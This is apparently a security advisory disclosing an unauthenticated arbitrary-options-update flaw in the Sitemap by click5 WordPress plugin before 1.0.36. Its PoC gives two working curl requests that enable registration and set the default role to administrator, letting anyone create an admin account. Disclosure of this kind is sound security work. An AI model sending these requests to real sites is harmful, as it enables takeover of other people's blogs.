Sitemap by click5 < 1.0.36 - Unauthenticated Arbitrary Options Update

The plugin does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin. As a result, unauthenticated attackers could change arbitrary blog options, such as the users_can_register and default_role, allowing them to create a new admin account and take over the blog.

PoC

Allow user registrations: curl ‘https://example.com/?rest_route=/click5_sitemap/API/update_html_option_AJAX’ \ -H ‘Content-Type: application/json’ \ --data ‘{“users_can_register”: 1}’ Set the default user role to administrator: curl ‘https://example.com/?rest_route=/click5_sitemap/API/update_html_option_AJAX’ \ -H ‘Content-Type: application/json’ \ --data ‘{“default_role”:“administrator”}’